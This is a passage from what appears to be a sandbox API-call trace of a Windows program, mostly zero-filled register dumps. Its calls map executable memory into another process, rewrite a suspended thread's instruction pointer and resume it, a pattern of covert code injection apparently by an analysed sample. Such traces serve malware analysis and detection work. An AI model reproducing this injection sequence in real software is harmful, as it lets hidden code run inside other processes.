[267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0189.907] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x10c) returned 0x0 [0189.907] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0x164200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0x32a0000, SectionOffset=0x0, ViewSize=0x19e6b0*=0x165000) returned 0x0 [0189.907] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0x104, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0x164200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0x2800000, SectionOffset=0x0, ViewSize=0x19e6ec*=0x165000) returned 0x0 [0195.035] NtGetContextThread (in: ThreadHandle=0x104, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x42fe70, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x42fe18, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x42fdfc, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0195.035] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x10c) returned 0x0 [0195.036] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0x161200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0x32a0000, SectionOffset=0x0, ViewSize=0x19e6b0*=0x162000) returned 0x0 [0195.036] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xbc, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0x161200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0x9b0000, SectionOffset=0x0, ViewSize=0x19e6ec*=0x162000) returned 0x0 [0195.077] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x32a0000) returned 0x0 [0195.098] NtClose (Handle=0x10c) returned 0x0 [0195.098] NtSetContextThread (ThreadHandle=0x104, Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x42fe70, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x42fe18, Eip=0xa7e707, SegCs=0x23, EFlags=0x246, Esp=0x42fdfc, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0195.098] NtResumeThread (in: ThreadHandle=0x104, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0195.098] NtClose (Handle=0xbc) returned 0x0 [0195.099] NtClose (Handle=0x104) returned 0x0 [0195.100] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea3c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea54*(UniqueProcess=0xc4, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0x104) returned 0x0 [0195.100] NtQueryInformationProcess (in: ProcessHandle=0x104, ProcessInformationClass=0x1a, ProcessInformation=0x19ea64, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ea64, ReturnLength=0x0) returned 0x0 [0195.100] NtQueryInformationProcess (in: ProcessHandle=0x104, ProcessInformationClass=0x0, ProcessInformation=0x19e6e8, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e6e8, ReturnLength=0x0) returned 0x0 [0195.100] NtReadVirtualMemory (in: ProcessHandle=0x104, BaseAddress=0x7efde000, Buffer=0x19e9fc, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0x19e9fc*, NumberOfBytesRead=0x0) returned 0x0 [0195.101] NtDelayExecution (Alertable=0, Interval=0x19e6d0*=-50000000) returned 0x0 [0195.112] NtOpenThread (in: ThreadHandle=0x19ea68, DesiredAccess=0x1a, ObjectAttributes=0x19e6b4, ClientId=0x19e6cc*(UniqueProcess=0x0, UniqueThread=0x5a8) | out: ThreadHandle=0x19ea68*=0xbc) returned 0x0 [0195.113] NtSuspendThread (in: ThreadHandle=0xbc, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0195.113] NtMapViewOfSection (in: SectionHandle=0xec, ProcessHandle=0x104, BaseAddress=0x19e708*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19e708*=0x2150000, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000) returned 0x0 [0195.120] NtGetContextThread (in: ThreadHandle=0xbc, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, 